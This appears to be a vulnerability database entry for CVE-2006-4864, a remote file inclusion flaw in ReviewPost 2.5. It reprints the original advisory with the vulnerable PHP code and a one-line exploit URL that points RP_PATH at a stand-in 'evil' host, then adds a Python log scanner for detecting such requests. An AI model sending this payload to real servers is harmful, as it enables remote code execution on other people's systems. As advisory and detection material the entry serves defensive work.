All Enthusiast ReviewPost 'index.php' PHP Remote File Inclusion Vulnerability

Vulnerability ID 1193455 Vulnerability type Unknown
Published 2006-09-19 Updated 2006-09-19
CVE ID CVE-2006-4864 CNNVD-ID CNNVD-200609-343
Platform N/A CVSS score 7.5
|Vulnerability source
https://www.securityfocus.com/bid/84182
https://cxsecurity.com/issue/WLB-2006090131
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200609-343
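|Vulnerability details
A PHP remote file inclusion vulnerability exists in index.php of All Enthusiast ReviewPost. A remote attacker can execute arbitrary PHP code via a URL in the RP_PATH parameter.
|Exploit (EXP)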
#############################Solpot Crew Community##############################
#
#  ReviewPost 2.5 (RP_PATH) Remote File Inclusion
#
#  Download File : http://3-bius.com/ReviewPost.zip
#
################################################################################
#
#       Bug Found By :home_edition2001 a.k.a (bius) (15-09-2006)
#
#       contact: bius (at) mac (dot) com
#
#       Website : http://www.nyubicrew.org/adv/home_edition2001-adv-01.txt
#
################################################################################
#
#      Greetz: Solpot,Matdule,Fungky,psycho_l061c,rm_2online,ax[I]xu,can4da_dry
#              imam26_it,ant1casper (please add more)
#              #nyubi , #hitamputih @dalnet
#              and all member solpotcrew community
#              http://www.nyubicrew.org/forum/
#              especially thx to Solpot @ nyubi (at) dal (dot) net
#
################################################################################

Input passed to the "RP_PATH" is not properly verified before being used to include files. This can be exploited to execute arbitrary PHP code by including files from local or external resources.

Code from index.php:

<?php
require "pp-inc.php";

if ( is_numeric($argv[0]) ) {
    header("Location: {$Globals['maindir']}/showproduct.php?product={$argv[0]}");
    exit;
}

// $RP_PATH is used to build the include paths below without being verified
require "$RP_PATH/languages/$rplang/index.php";
require "$RP_PATH/login-inc.php";

if ( file_exists("install.php") || file_exists("{$Globals['maindir']}/install.php") ) {
    diewell( "For security reasons, please remove the install.php from the ReviewPost directory before proceeding." );
    exit;
}
?>

NB: other files are vulnerable too :)

exploit : http://somehost/path_to_ReviewPost/index.php?RP_PATH=http://evil

################################################################################
######################################E.O.F#####################################
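
Added example (not part of the advisory or of ReviewPost): a Python check that scans web-server access logs for requests supplying a URL in the RP_PATH parameter described above. The log lines, the /reviewpost/ path and the function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

PARAM = "RP_PATH"  # parameter named in the advisory
# Request line of a common/combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')
# Value starts with a scheme (http:, ftp:, php:, data:), //host or a UNC path.
REMOTE_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.\-]+:|//|\\\\)', re.I)

# Constructed sample log lines (documentation addresses, hypothetical paths).
SAMPLE_LOG = [
    '198.51.100.7 - - [19/Sep/2006:10:01:02 +0000] '
    '"GET /reviewpost/index.php?RP_PATH=http://remote.example/x HTTP/1.1" 200 512',
    '198.51.100.7 - - [19/Sep/2006:10:01:09 +0000] '
    '"GET /reviewpost/index.php?cat=5&RP_PATH=hTtP%3A%2F%2Fremote.example%2Fx HTTP/1.1" 200 512',
    '203.0.113.4 - - [19/Sep/2006:10:02:00 +0000] '
    '"GET /reviewpost/showproduct.php?product=12 HTTP/1.1" 200 2048',
    '203.0.113.4 - - [19/Sep/2006:10:02:31 +0000] '
    '"GET /reviewpost/index.php?RP_PATH=. HTTP/1.1" 200 2048',
]


def suspicious_values(log_line):
    """Return RP_PATH values in one log line that name a remote resource."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return []
    query = urlsplit(match.group("target")).query
    # parse_qsl percent-decodes names and values, so encoded URLs are caught too.
    return [value for name, value in parse_qsl(query, keep_blank_values=True)
            if name == PARAM and REMOTE_RE.match(value)]


def scan(lines):
    """Group suspicious RP_PATH values by client address (first log field)."""
    findings = {}
    for line in lines:
        hits = suspicious_values(line)
        if hits:
            findings.setdefault(line.split(" ", 1)[0], []).extend(hits)
    return findings


if __name__ == "__main__":
    for client, values in scan(SAMPLE_LOG).items():
        print(client, values)
```

Access logs record only the query string, so an RP_PATH value sent in a POST body or cookie will not show up here.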
|Affected products
All Enthusiast Inc ReviewPost PHP Pro 2.5
|References

Source: XF
Name: reviewpostphppro-rppath-file-include(28992)
Link: http://xforce.iss.net/xforce/xfdb/28992
Source: BUGTRAQ
Name: 20060915 Solpot Crew Advisory #11 - ReviewPost 2.5 (RP_PATH) Remote File Inclusion
Link: http://www.securityfocus.com/archive/1/archive/1/446106/100/0/threaded
Source: MISC
Link: http://www.nyubicrew.org/adv/home_edition2001-adv-01.txt
Source: VUPEN
Name: ADV-2006-3658
Link: http://www.frsirt.com/english/advisories/2006/3658
Source: SECUNIA
Name: 21971
Link: http://secunia.com/advisories/21971
Source: SREASON
Name: 1603
Link: http://securityreason.com/securityalert/1603